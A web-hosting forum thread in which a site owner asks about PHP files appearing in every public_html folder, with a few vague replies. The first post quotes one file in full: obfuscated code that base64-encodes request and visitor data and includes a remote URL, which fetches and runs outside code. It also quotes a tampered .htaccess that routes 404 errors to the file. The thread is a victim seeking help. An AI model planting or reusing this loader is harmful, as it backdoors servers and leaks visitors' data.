Hello, I am currently baffled by something which is happening on a hosting account. Files have been appearing in each sub-directory of public_html with the names 4504.php for example. The file contents are: - <? error_reporting ; $s="e"; $a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF); $e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING); $f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME); $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str);} ?> PHP: The .htaccess files in the folders change aswell for example: - Options -MultiViews ErrorDocument 404 //radio/74539.php Code (markup): I have never seen this before, the host of the server seems to think it is a PHP Injection. However it has done it before previously on another domain. Has anyone seen it before or know what it is. Any help would be great
If it is a php injection it would probably be done through a contact form. Have you received any unusual messages through an online contact form?
I think that your host should be able to give you more to go on than "seems to think it is a PHP Injection". That 'seems' a little vague to me. Have you looked through the code on any of your pages for anything that seemed out of place? Sorry, I cant be more specific as I am not sure yet what is happening and since I do not have access to the site it is hard to say what it is. What is the url? If you dont want to post it publicly you may PM me.
I used "view source" to look through the code and I did not see anything that was out of place either. Hopefully there will be some others who will read this thread that may have some suggestions.